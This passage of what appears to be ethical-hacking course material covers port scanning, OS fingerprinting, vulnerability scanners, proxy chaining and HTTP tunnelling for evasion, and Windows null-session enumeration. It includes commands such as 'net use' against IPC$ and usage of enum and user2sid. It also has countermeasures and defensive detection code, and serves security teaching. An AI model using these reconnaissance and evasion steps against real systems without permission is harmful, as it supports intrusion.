1. determine ownership of IP addresses,
2. translate IP addresses to hostnames,
3. scan networks,
4. port probe target computers for services,
5. validate email addresses,
6. determine ownership of domains,
7. list the computers in a
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Super Scan

[Screenshot: SuperScan 3.00 scanning the range 64.3x.3x.xxx; host 64.33.30.117 shows 25 Simple Mail Transfer, 80 World Wide Web HTTP (Server: Microsoft-IIS/4.0), 110 Post Office Protocol - Version 3, 135 DCE endpoint resolution, 143 Internet Message Access Protocol, 1032 BBN IAD, 5631 pcANYWHEREdata and 5800 Virtual Network Computing server (RFB 003.003)]

It is a TCP port scanner, pinger and hostname resolver. It can perform ping scans, port scans using any IP range and scan any port range from a built in list or specified range.
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FloppyScan

• Floppyscan is a dangerous hacking tool which can be used to portscan a system using a floppy disk
• Boots up mini Linux
• Displays a Blue Screen of Death screen
• Port scans the network using NMAP
• Sends the results by e-mail to a remote server
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Interesting ports on 192.168.100.5:
(The 1646 ports scanned but not shown below are in state: closed)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1025/tcp  open  NFS-or-IIS
1026/tcp  open  LSA-or-nterm
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
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War Dialer

• War dialing involves the use of a program in conjunction with a modem to penetrate the modem-based systems of an organization by continually dialing in.
• Companies do not control the dial-in ports as strictly as the firewall, and machines with modems attached are present everywhere.
• A tool that identifies the phone numbers that can successfully make a connection with a computer modem.
• It generally works by using a predetermined list of common user names and passwords in an attempt to gain access to the system.
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Wardialing
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THC Scan

[Screenshot: THC-Scan configuration screen showing scan mode, dial mode (manual/autonomous), carrier hack/nudge settings with nudge delay, timeout and ringout values in seconds, redial-busy and busy-overwrite options, elapsed time calculation and DAT file save settings]

It is a type of War Dialer that scans a defined range of phone numbers.

Another tool for wardialing is PhoneSweeper.
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PortScan Plus, Strobe

• PortScan Plus
  - Windows-based scanner developed by Peter Harrison
  - The user can specify a range of IP addresses and ports to be scanned
  - When scanning a host or a range of hosts, it displays the open ports on those hosts

• Strobe
  - A TCP port scanner developed by Julian Assange
  - Written in C for UNIX-based operating systems
  - Scans all open ports on the target host
  - Provides only limited information about the host
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• A TCP port scanner for UNIX-based operating systems
• Pings target hosts for examining connectivity
• Scans subnets on a network
• Examination of FTP for anonymous access
• Examination of CGI bugs
• Examination of POP3 and FTP for brute force vulnerabilities
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Banner grabbing

OS Fingerprinting

• OS fingerprinting is the term used for the method that is used to determine the operating system that is running on the target system.
• The two different types of fingerprinting are:
  - Active stack fingerprinting
  - Passive fingerprinting
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Active Stack Fingerprinting

• It is based on the fact that various vendors of OS implement the TCP stack differently.
• Specially crafted packets are sent to the remote OS and the response is noted.
• The responses are then compared with a database to determine the OS.
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Telnet

• You can use telnet for banner grabbing

telnet www.xsecurity.com 80
HEAD / HTTP/1.0

[Screenshot: Command Prompt]

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 07 Jul 2005 13:08:16 GMT
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGKOFFIPOLHPLNE; path=/
Via: 1.1 Application and Content Networking System Software 5.1.15
Connection: Close

Connection to host lost.

C:\>
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Tools for Active Stack Fingerprinting

• XPROBE2
  It is a remote OS detection tool which determines the OS running on the target system with minimal target disturbance.

• RING v2
  http://www.sys-security.com/
  This tool is designed with a different approach to OS detection. This tool identifies the OS of the target system with a matrix based fingerprinting approach.

Most of the port scanning tools like Nmap are used for active stack fingerprinting.
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Passive Fingerprinting

• Passive banner grabbing refers to indirectly scanning a system to reveal its server operating system.
• It is also based on the differential implementation of the stack and the various ways an OS responds to it.
• It uses sniffing techniques instead of scanning techniques.
• It is less accurate than active fingerprinting.
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Netcraft

• The Netcraft website ( http://www.netcraft.com ) can be used to identify the remote OS of a target system passively.
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[Screenshot: Netcraft site report for www.eccouncil.org in Internet Explorer (http://toolbar.netcraft.com/site_report?url=www.eccouncil.org), listing last reboot, domain, netblock owner, IP address, site rank, country, nameserver, date first seen, DNS admin, domain registry, reverse DNS, organisation and nameserver organisation]
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Vulnerability scanning
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SAINT

• It is also known as Security Administrator's Integrated Network Tool.
• It detects the network vulnerabilities on any remote target in a non-intrusive manner.
• It gathers information regarding what type of OS is running and what ports are open.
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4 Steps to a SAINT Scan

[Figure: SAINT engine workflow: 1) Find targets (host is alive) → 2) Port scan (HTTP service running) → 3) HTTP vulnerability check (IIS vulnerability) → 4) reports from the server: Executive Summary, Detailed Technical Reports, Recommended Fixes, Trend Analysis]
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ISS Security

• Internet Security Scanner provides automated vulnerability detection and analysis of networked systems.
• It performs automated, distributed or event-driven probes of geographically dispersed network services, OS, routers/switches, firewalls and applications and then displays the scan results.
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Nessus

• Nessus is a vulnerability scanner, a program that looks for bugs in software.
• An attacker can use this tool to violate the security aspects of a software product.

Features

• Plug-in architecture
• NASL (Nessus Attack Scripting Language)
• Can test an unlimited number of hosts at the same time.
• Smart service recognition
• Client-server architecture
• Smart plug-ins
• Up-to-date security vulnerability database
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Screenshot Of Nessus

[Screenshot: Nessus client window]
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GFI LANGuard

• GFI LANGUARD analyzes the operating system and the applications running on a network and finds out the security holes present.
• It scans the entire network, IP by IP, and provides information such as the service pack level of the machine, missing security patches, and lots more.

[Screenshot: GFI LANguard S.E.L.M. 5.0 Configuration console showing event processing rules for the Security, Application, System and GFI Applications event logs, with the "Exchange Server Important Events" rule set (52 rules) listed: out of memory exceptions, ADC/LDAP errors, disk space and service failures, mailbox storage limits and database corruption events]
GFI LANguard Features

© Fast TCP and UDP port scanning and identification
© Finds all the shares on the target network
© Alerts on and pinpoints security issues
© Automatically detects new security holes
© Checks password policy
© Finds out all the services that are running on the target network
© Vulnerabilities database includes UNIX/CGI issues
SATAN (Security Administrator's Tool for Analyzing Networks)

© Security-auditing tool developed by Dan Farmer and Wietse Venema
© Examines UNIX-based systems and reports the vulnerabilities
© Provides information about the software, hardware and network topologies
© User-friendly program with an X Window interface
© Written using the C and Perl languages. Thus, to run SATAN, the attacker needs Perl 5 and a C compiler installed on the system.
© In addition, the attacker needs a UNIX-based operating system and at least 20 MB of disk space
Retina

© Retina network security scanner is a network vulnerability assessment scanner.
© It can scan every machine on the target network, including a variety of operating system platforms, networking devices, databases and third party or custom applications.
© It has the most comprehensive and up-to-date vulnerability database and scanning technology
Retina: Screenshot

[Screenshot: Retina - [Untitled] - EVALUATION VERSION - 14 Days Remaining (menus: File, Edit, View, Action, Tools, Help). Left pane: Browser, Miner, Scanner, Tracer; scanned host 192.168.000.044.

General (192.168.000.044)
Address: 192.168.0.44
Report Date: 08/12/03 03:04:32 PM
Domain Name: neo.office.upstream.se
Ping Response: Host Responded
Avg Ping Response: 10 ms
Time To Live: 128
Traceroute: 192.168.0.44

Audits (192.168.000.044)
NetBIOS: Null Session
Remote Access: PCAnywhere
IP Services: TCP IP Security
Registry: Auto Sharing Drive Problem (NT Server)
Registry: Auto Sharing Drive Problem (NT Wks)
Registry: MS RAS Logging
Registry: MSCHAPv2 VPN
Registry: NTFS 8 Dot 3
Registry: Printer Driver Sec
Registry: Shutdown without Logon
Remote Access: DCOM Enabled
Remote Access: Dialup Save Password

Selected audit: IP Services: TCP IP Security

Description: TCP/IP Security is not enabled. It is recommended for maximum security that you set up strict settings as to what ports you will allow incoming data to go to. For example, if your server only acts as a web server you should set the TCP/IP security options to be:
TCP Permit Only: 80, 443
UDP Permit Only: none
IP Permit All

Risk Level: Medium

How To Fix: To configure TCP/IP security settings:
1. Open Control Panel

Status bar: Support | Links | "Did you know... You can easily enter a range of IP Addresses to scan from the Scanner Interface by typing CTRL + R." Scan complete.]
NIKTO

© NIKTO is an open source web server scanner.
© It performs comprehensive tests against web servers for multiple items.
© It tests web servers in the shortest time possible
© Uses RFP's libwhisker as a base for all network functionality
© For easy updates, the main scan database is in CSV format
© SSL support
© Output to file in simple text, HTML or CSV format
© Plug-in support
© Generic and server type specific checks
SAFEsuite Internet Scanner, IdentTCPScan

© SAFEsuite Internet Scanner
  • Developed by Internet Security Systems (ISS) to examine the vulnerabilities in Windows NT networks
  • Requirements are Windows NT 3.51 or 4.0 and a product license key
  • Reports all possible security gaps on the target system
  • Suggests possible corrective actions
  • Uses three scanners: Intranet, Firewall and Web Scanner

© IdentTCPScan
  • Examines open ports on the target host and reports the services running on those ports.
  • A special feature reports the UIDs of the services
Draw network diagrams of vulnerable hosts
Cheops

[Screenshot: Cheops Network User Interface (menus: File, Page, Friends, Help) showing a map of hosts in the 207.230.72.x range; status line "Saved 'root.cheops-map'".]

Cheops is a network management tool that can be used for OS detection, network mapping, listing the services running on a network, generalized port scanning, etc.



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



FriendlyPinger

[Screenshot: Friendly Pinger [Demo.map] (menus: File, Edit, View, Ping, Notification, Scan, Connections, Inventory, Help) with a device context menu: Reboot, Telnet, Open, Open in WinCmd, Select in FChat, Edit, Align, Ping/Trace, Notification, Inventory..., Set Device Type, Configure Device Type..., Configure Device...; status "pinging...".]

Friendly Pinger is a powerful and user-friendly application for network administration and monitoring.

It can be used to ping all devices in parallel at once and to assign external commands (like telnet, tracert, net.exe) to devices.
Scenario

Jack traces the IP address of the company's Web Server and then runs several types of Nmap scans to find the open ports and hence the services running. As presumed by him, most of the unnecessary services were running. It provided him the perfect ground to exploit the vulnerabilities.

• Which services do you think Jack would target?

• Can Jack use the open ports to send commands to a computer, gain access to a server, and exert command over the networking devices?

• What are the countermeasures against port scanning?

• How can firewalls be evaded during scanning?
Preparing proxies

Proxy Servers

© A proxy is a network computer that can serve as an intermediary for connections with other computers.

© They are usually used for the following purposes:

  • As a firewall, a proxy protects the local network from outside access.

  • As an IP-address multiplexer, a proxy allows a number of computers to connect to the Internet when having only one IP address.

  • Proxy servers can be used (to some extent) to anonymize web surfing.

  • Specialized proxy servers can filter out unwanted content, such as ads or 'unsuitable' material.

  • Proxy servers can afford some protection against hacking attacks.
Free Proxy Servers

© Thousands of free proxy servers are available on the Internet

© Search for "free proxy servers" in Google

© Some of them might be honeypots to catch hackers red-handed

[Screenshot: Google search for "free proxy servers" in Microsoft Internet Explorer (http://www.google.com/search?complete=1&hl=en&q=free+proxy+servers). Results shown: "FREE PUBLIC PROXY SERVERS LIST: HTTP, HTTPS, CONNECT, IRC, SOCKS ..." (tools.rosinstrument.com/proxy/); "Proxy 4 Free: Proxy List - Page 1" (www.proxy4free.com/page1.html, 8 Jul 2005); "Proxy 4 free - Free Public Proxy Servers: Home" (www.proxy4free.com/); "FREE PROXY servers: free lists, detailed proxy FAQ, programs ..." (www.freeproxy.ru/).]
Use of Proxies for Attacking

SocksChain

© SocksChain is a program that allows working through a chain of SOCKS or HTTP proxies to conceal the actual IP address.

© SocksChain can function as a usual SOCKS server that transmits queries through a chain of proxies.

[Screenshot: SocksCap Setup dialog. Server: SOCKS Server 127.0.0.1, Port 1080, SOCKS User ID; Protocol: Socks4 / Socks5 (Socks5 selected); Supported Authentication: GSSAPI, Username/Password; Name Resolution: Resolve all names locally / Resolve all names remotely (selected) / Attempt local then remote.]
Anonymizers

© Anonymizers are services that help to make web surfing anonymous.

© The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.

© An anonymizer removes all the identifying information from a user's computer while the user surfs the Internet, thereby ensuring the privacy of the user.
Surfing Anonymously

[Diagram: the user's browser reaches www.target.com through an anonymizer; label fragment "Bypasses the ...".]
Httptunnel

© It is used to create a bidirectional virtual data path tunneled in HTTP requests.

© The requests can be sent via an HTTP proxy if so desired.

© It can be used to bypass firewalls.

[Screenshot: C:\WINDOWS\System32\cmd.exe running "htc --help" from httptunnel 3.3; the left margin with the short option letters is cut off, so only the long options and their descriptions are shown:]

    Usage: htc [OPTION]... HOST[:PORT]

    Set up a httptunnel connection to PORT at HOST (default port is 8888).
    When a connection is made, I/O is redirected from the source specified
    by the --device, --forward-port or --stdin-stdout switch to the tunnel.

      --proxy-authorization USER:PASSWORD   proxy authorization
      --proxy-authorization-file FILE       proxy authorization file
      --proxy-buffer-size BYTES             assume a proxy buffer size of BYTES bytes
                                            (k, M, and G postfixes recognized)
      --content-length BYTES                use HTTP PUT requests of BYTES size
                                            (k, M, and G postfixes recognized)
      --device DEVICE                       use DEVICE for input and output
      --forward-port PORT                   use TCP port PORT for input and output
      --help                                display this help and exit
      --keep-alive SECONDS                  send keepalive bytes every SECONDS seconds
                                            (default is 5)
      --max-connection-age SEC              maximum time a connection will stay
                                            open is SEC seconds (default is 300)
      --proxy HOSTNAME[:PORT]               use a HTTP proxy (default port is 8080)
      --stdin-stdout                        use stdin/stdout for communication
                                            (implies --no-daemon)
      --strict-content-length               always write Content-Length bytes in requests
      --timeout TIME                        timeout, in milliseconds, before sending
                                            padding to a buffering proxy
      --user-agent STRING                   specify User-Agent value in HTTP requests
      --version                             output version information and exit
      --no-daemon                           don't fork into the background
HTTPort

[Screenshot: HTTPort 3.SNF. System tab, "HTTP proxy you need to bypass": Host name or IP address, Port; Proxy options: Authorize (User name, Password); Other options: User-Agent "IE 6.0"; Bypass mode: "Remote host"; "Use personal remote host at (if blank, use public)": Hostname or IP address, Port, Password. Port mapping tab, "Static TCP/IP port mappings (tunnels)": Yahoo! POP3, External HTTP proxy (sample), Microsoft News server, IRC server (sample), Microsoft Outlook POP3, Microsoft Outlook SMTP; Built-in SOCKS4 server: "Run SOCKS server (port 1080)", "Full SOCKS4 support (BIND)" (available in "Remote Host" mode); statistics: "No stats - inactive".]

HTTPort (client) and HTTHost (server) are free tools which can be used to tunnel any TCP traffic through the HTTP protocol.

Visit http://www.htthost.com for more information.
Countermeasures

© The firewall of a particular network should be good enough to detect the probes of an attacker. The firewall should carry out stateful inspection with a specific rule set.

© Network intrusion detection systems should be used to detect the OS detection method used by tools such as Nmap.

© Only needed ports should be kept open and the rest should be filtered.

© Sensitive information that is not to be disclosed to the public over the Internet should not be displayed.
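The firewall and NIDS countermeasures above come down to one observable: a single source touching many distinct ports in a short time. The following is an added example (not from the course material) of that detection logic in Python, run over constructed iptables-style DROP log lines; the 60-second window and the 10-port threshold are assumptions to tune per environment.

```python
"""Flag port-scan probes in firewall deny logs.

Added example, not from the course material.  Log lines are constructed in
an iptables-style "DROP" format; the 60-second window and the 10-port
threshold are assumptions to tune per environment.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source probes 12 ports in 4 seconds, another
# touches 2 ports 5 minutes apart (ordinary failed connections).
SAMPLE_LOG = """\
2024-01-01T10:00:01 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=21
2024-01-01T10:00:01 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=22
2024-01-01T10:00:01 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=23
2024-01-01T10:00:02 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=25
2024-01-01T10:00:02 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=53
2024-01-01T10:00:02 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=110
2024-01-01T10:00:03 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=135
2024-01-01T10:00:03 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=139
2024-01-01T10:00:03 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=143
2024-01-01T10:00:04 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=445
2024-01-01T10:00:04 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=1433
2024-01-01T10:00:04 DROP SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=3389
2024-01-01T10:00:05 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=8080
2024-01-01T10:05:00 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=8443
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) DROP SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=(?P<proto>\S+) DPT=(?P<dpt>\d+)$"
)


def parse_line(line):
    """Return a dict for a DROP line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return {
        "ts": datetime.fromisoformat(d["ts"]),
        "src": d["src"],
        "dst": d["dst"],
        "proto": d["proto"],
        "dpt": int(d["dpt"]),
    }


def detect_scans(log_text, window=timedelta(seconds=60), min_ports=10):
    """Return {src: {dst: [ports]}} for every source that probed at least
    min_ports distinct ports on one destination inside a sliding window."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["src"], e["dst"])].append(e)

    alerts = defaultdict(lambda: defaultdict(set))
    for (src, dst), evs in by_pair.items():
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until the span fits in `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            ports = {e["dpt"] for e in evs[start:end + 1]}
            if len(ports) >= min_ports:
                alerts[src][dst].update(ports)
    return {src: {dst: sorted(p) for dst, p in dsts.items()}
            for src, dsts in alerts.items()}


if __name__ == "__main__":
    for src, dsts in detect_scans(SAMPLE_LOG).items():
        for dst, ports in dsts.items():
            print("possible port scan: %s -> %s, %d ports: %s"
                  % (src, dst, len(ports), ports))
```

The per-(source, destination) window is what separates a scan from a busy but legitimate client: 198.51.100.7 above hits two ports, but five minutes apart, so it never crosses the threshold even when it is lowered.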
ATTACK !!

Summary

© Scanning is one of three components of intelligence gathering for an attacker

© The objective of scanning is to discover live systems, active running ports, the operating systems and the services running on the network.

© Some of the popular scanning tools are Nmap, Nessus and Retina.

© A chain of proxies can be created to evade the traceback of the attacker.
Ethical Hacking

Module IV
Enumeration

Scenario

It was a rainy day and Jack was getting bored sitting at home. He wanted to do some work rather than gazing at the sky. Jack had heard about enumerating user accounts and other important information from systems using Null Sessions. He wanted to try out what he had learned in his information security class. His friends told him that the university website had a flaw where anonymous users could log in.

Jack had installed an application which used Null Sessions to enumerate systems. He tried out the application and to his surprise he got a list of information about the system where the webserver was hosted.

What had started as fun became serious stuff... Jack started having some evil thoughts after seeing the vulnerability...

What can Jack do with the gathered information?

Can he create chaos?

What if Jack had enumerated a vulnerable system meant for online trading?
Module Objectives

© Understanding Windows 2000 Enumeration

© How to Connect via a Null Session

© How to Disguise NetBIOS Enumeration

© Disguise using SNMP Enumeration

© How to Steal Windows 2000 DNS Information Using Zone Transfers

© Learn to Enumerate Users via CIFS/SMB

© Active Directory Enumerations
Module Flow

[Flow diagram; recoverable nodes: What is Enumeration; Overview of System Hacking Cycle; Techniques for Enumeration; NetBIOS Null Sessions; Establishing Null Session; Tools Used; Enumerating User Accounts; Tools Used; Null Session Countermeasures; SNMP Enumeration; SNMP Scan; SNMP Util Example; SNMP Enumeration Countermeasures; Tools: Winfingerprint; Printer Enumeration; Active Directory Enumeration; Countermeasures.]



Overview of System Hacking Cycle

[Diagram of the six steps:]

Step 1: Enumerate users. Extract user names using: Win2k enumeration, SNMP, email IDs

Step 2: Crack the password. Crack the password using: Brute, L0phtCrack, John the Ripper

Step 3: Escalate privileges. Escalate privileges using: GetAdmin

Step 4: Execute applications, such as: key loggers, root kits, pstools

Step 5: Hidden files. Extract hidden files using: steganography, image hide, mp3

Step 6: Cover your tracks. Cover your tracks using applications like: auditpol
What is Enumeration

© Enumeration is defined as extraction of user names, machine names, network resources, shares and services.

© Enumeration techniques are conducted in an Intranet environment.

© Enumeration involves active connections to systems and directed queries.

© The type of information enumerated by intruders:

  • Network resources and shares

  • Users and groups

  • Applications and banners

  • Auditing settings
Techniques for Enumeration

© Some of the techniques for Enumeration are

  • Extract user names using Win2k enumeration

  • Extract user names using SNMP

  • Extract user names using E-mail IDs
NetBIOS Null Sessions

© The null session is often referred to as the Holy Grail of Windows hacking. Null sessions take advantage of flaws in CIFS/SMB (Common Internet File System / Server Message Block).

© You can establish a null session with a Windows (NT/2000/XP) host by logging on with a null user name and password.

© Using these null connections allows you to gather the following information from the host:

  • List of users and groups

  • List of machines

  • List of shares

  • Users and host SIDs (Security Identifiers)
Anyone with a NetBIOS connection to your computer can easily get a full dump of all your user names, groups, shares, permissions, policies, services, and more using the Null user. The syntax below connects to the hidden Inter Process Communication 'share' (IPC$) at IP address 192.34.34.2 with the built-in anonymous user (/u:"") and a ("") null password.

    C:\>net use \\192.34.34.2\IPC$ "" /u:""

The attacker now has a channel over which to attempt various techniques.

The CIFS/SMB and NetBIOS standards in Windows 2000 include APIs that return rich information about a machine via TCP port 139 - even to unauthenticated users.
Tool: DumpSec

DumpSec reveals shares over a null session with the target computer.

[Screenshot: Somarsoft DumpSec (formerly DumpAcl) - \\192.168.2.1 10 (menus: File, Edit, Search, Report, View, Help), Report > Policies. The rc=5 lines are Win32 error 5, ERROR_ACCESS_DENIED, i.e. calls the null session was not allowed to make:]

    Account Policies
    ==>rc=5 NetUserModalsGet(0)
    ==>rc=5 NetUserModalsGet(3)
    ==>Not authorized to view remaining policy information
    Replication
    ==>rc=5 OpenSCManager
    System Path Components (in search order)
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers (s...
    (key not present)
NetBIOS Enumeration

© NBTscan is a program for scanning IP networks for NetBIOS name information.

© For each responding host it lists the IP address, NetBIOS computer name, logged-in user name, and MAC address.

[Screenshot: C:\WINNT\System32\cmd.exe running nbtscan against 192.168.2.0/24:]

    Doing NBT name scan for addresses from 192.168.2.0/24

    192.168.2.0 Sendto failed: Cannot assign requested address
    192.168.2.1 Recvfrom failed: Connection reset by peer

    NetBIOS Name Table for Host 192.168.2.4:

    Name               Service                     Type
    USER               Workstation Service
    WORKGROUP          Domain Name
    USER               Messenger Service

    Adapter address: 00-0b-2b-0e-af-59

    NetBIOS Name Table for Host 192.168.2.7:

    Name               Service                     Type
    JCIIR02            Workstation Service
    RANGE2             Domain Name
    JCIIR02            Messenger Service
    JCIIR02            File Server Service
    RANGE2             Browser Service Elections
    RANGE2             Master Browser
    __MSBROWSE__       Master Browser

    Adapter address: 00-80-ad-83-a5-2e

    NetBIOS Name Table for Host 192.168.2.24:

    Name               Service                     Type
    COMPUTRE1          Workstation Service
    COMPUTRE1          Messenger Service

    Adapter address: 00-c1-26-10-d4-2d

The first thing a remote attacker will try on a Windows 2000 network is to get a list of the hosts attached to the wire:

    1. net view /domain
    2. nbtstat -A <some IP>
Tool: SuperScan4

© It's a powerful connect-based TCP port scanner, pinger, and hostname resolver.

© It performs ping scans and port scans using any IP range or by specifying a text file to extract addresses from.

© Scans any port range from a built-in list or a specified range.

© Resolves and reverse-looks-up any IP address or range.

© Modifies the port list and port descriptions by using the built-in editor.

© It connects to any discovered open port using user-specified "helper" applications (e.g. Telnet, Web browser, FTP) and assigns a custom helper application to any port.
Snapshot for SuperScan

[Screenshot: SuperScan 4.0, Scan tab (tabs: Scan, Host and Service Discovery, Scan Options, Tools, Windows Enumeration, About). Hostname/IP: www.certifiedhacker.com; Start IP / End IP 202.129.165.126; "Read IPs from file". Log output:]

    Live hosts this batch: 1
    202.129.165.126
    Hostname: (Unknown)
    TCP ports (18): ... 110, 112, 229, 443, ... 3306, ... (remaining entries illegible)
    UDP ports (3): 53, 123, 161

    Performing hostname resolution...
    TCP banner grabbing (18 ports)
    UDP banner grabbing (3 ports)
    Reporting scan results
    Scan done

    Discovery scan finished: ...
    Saved log file
    Live: 1
Snapshot for Windows Enumeration

[Screenshot: SuperScan 4.0, Windows Enumeration tab. Hostname/IP/URL: www.certifiedhacker.com; buttons Stop, Options..., Clear. Enumeration Type (all checked): NetBIOS Name Table, NULL Session, MAC Addresses, Workstation type, Users, Groups, RPC Endpoint Dump, Account Policies, Shares, Domains, Remote Time of Day, Logon Sessions, Drives, Trusted Domains, Services, Registry. Log output:]

    Enumeration complete
    NetBIOS information on 202.129.165.126
    Attempting a NULL session connection on 202.129.165.126
    MAC addresses on 202.129.165.126
    Workstation/server type on 202.129.165.126
    Users on 202.129.165.126
    Groups on 202.129.165.126
    RPC endpoints on 202.129.165.126
    Password and account policies on 202.129.165.126

    Saved log file
    Live: 1 | TCP open: 18 | UDP open: 3 | 1/1 done
Tool: Enum

© Available for download from http://razor.bindview.com.

© enum is a console-based Win32 information enumeration utility.

© Using null sessions, enum can retrieve user lists, machine lists, share lists, name lists, group and membership lists, password and LSA policy information.

© enum is also capable of a rudimentary brute force dictionary attack on individual accounts.

[Screenshot: D:\WINNT\system32\cmd.exe running enum without arguments:]

    C:\>enum
    usage: enum [switches] [hostname|ip]
      -U: get userlist
      -M: get machine list
      -N: get namelist dump (different from -U|-M)
      -S: get share list
      -P: get password policy information
      -G: get group and member list
      -L: get LSA policy information
      -D: dictionary crack, needs -u and -f
      -d: be detailed, applies to -U and -S
      -c: don't cancel sessions
      -u: specify username to use (default "")
      -p: specify password to use (default "")
      -f: specify dictfile to use (wants -D)
    C:\>
Enumerating User Accounts

© Two powerful NT/2000 enumeration tools are:

  • 1. sid2user

  • 2. user2sid

© They can be downloaded at (www.chem.msu.su/~rudnyi/NT/)

© These are command line tools that look up NT SIDs from user name input and vice versa

[Screenshot: C:\WINNT\System32\cmd.exe:]

    D:\Module 4 - Enumeration\sid>user2sid \\196.… administrator

    S-1-5-21-1123561945-1788223648-725345543-500

    Number of subauthorities is 5
    Domain is ETRUSTFIREWALL
    Length of SID in memory is 28 bytes
    Type of SID is SidTypeUser
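What user2sid prints (five subauthorities, a 28-byte SID, the trailing RID 500) follows directly from the SID format. The Python below is an added example, not the course's or the tools' code; it parses the SID shown in the screenshot, reproduces those figures from the binary layout, and maps well-known RIDs (from Microsoft's documented list) to their accounts. The defensive point it illustrates: renaming the Administrator account does not change its RID 500, which is why sid2user still identifies it.

```python
"""Parse and describe Windows SIDs as printed by user2sid/sid2user.

Added example, not the course's or the tools' code.  SAMPLE_SID is the
one in the screenshot; WELL_KNOWN_RIDS lists Microsoft-documented
well-known relative identifiers.
"""
import struct

WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    514: "Domain Guests",
    519: "Enterprise Admins",
}

SAMPLE_SID = "S-1-5-21-1123561945-1788223648-725345543-500"


def parse_sid(text):
    """Split 'S-<rev>-<authority>-<sub>...' into (revision, authority, [subs])."""
    parts = text.strip().split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string: %r" % text)
    return int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]


def sid_to_bytes(text):
    """Binary SID: revision(1) count(1) authority(6, big-endian), then each
    subauthority as a 4-byte little-endian integer."""
    revision, authority, subs = parse_sid(text)
    out = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    for s in subs:
        out += struct.pack("<I", s)
    return out


def bytes_to_sid(data):
    """Inverse of sid_to_bytes."""
    revision, count = data[0], data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:8 + 4 * count])
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))


def describe_sid(text):
    """Reproduce what user2sid reports, plus the RID and any well-known name."""
    revision, authority, subs = parse_sid(text)
    rid = subs[-1] if subs else None
    info = {
        "revision": revision,
        "authority": authority,
        "subauthority_count": len(subs),
        "length_in_memory": len(sid_to_bytes(text)),
        "rid": rid,
        # everything before the RID identifies the issuing domain/machine
        "domain_sid": "-".join(text.strip().split("-")[:-1]) if len(subs) > 1 else None,
        "well_known": None,
    }
    # S-1-5-21-... is the NT authority's domain/machine account space
    if authority == 5 and subs[:1] == [21] and rid in WELL_KNOWN_RIDS:
        info["well_known"] = WELL_KNOWN_RIDS[rid]
    return info


if __name__ == "__main__":
    for key, value in describe_sid(SAMPLE_SID).items():
        print("%-20s %s" % (key, value))
```

The 28 bytes come out as 2 header bytes, 6 bytes of identifier authority and 5 × 4 bytes of subauthorities, matching the tool's "Length of SID in memory".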
Tool: GetAcct

© GetAcct sidesteps "RestrictAnonymous=1" and acquires account information on Windows NT/2000 machines.

© Downloadable from (www.securityfriday.com).

[Screenshot: GetAcct (menus: File, View, Help). Remote Computer: 192.168.2.162; End of RID: 1050; button "Get Account"; Domain/Computer Name: FUTURE.]
Null Session Countermeasure

© Null sessions require access to the TCP 139 and/or TCP 445 ports.

© Null session does not work with Windows 2003.

© You could also disable SMB services entirely on individual hosts by unbinding WINS Client TCP/IP from the interface.

© Edit the registry to restrict the anonymous user.

  • 1. Open regedt32, navigate to HKLM\SYSTEM\CurrentControlSet\LSA

  • 2. Choose Edit | Add Value

  • Value name: RestrictAnonymous

  • Data Type: REG_DWORD

  • Value: 2
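Besides hardening, null-session attempts can be seen in the logs: a null session is a network logon (Logon Type 3) by the built-in ANONYMOUS LOGON account, recorded as Security event 4624. The following is an added example (not from the course material) that runs that check over constructed records named after event 4624's fields; the threshold of three per source is an assumption, since a lone anonymous logon can be benign.

```python
"""Spot null-session activity in a Windows Security log export.

Added example, not from the course material.  The rows are constructed;
column names follow the EventData fields of event 4624 (TargetUserName,
LogonType, IpAddress, ...).  The per-source threshold is an assumption.
"""
import csv
import io
from collections import Counter

# Constructed export: one 4624 event per row.
SAMPLE_EXPORT = """\
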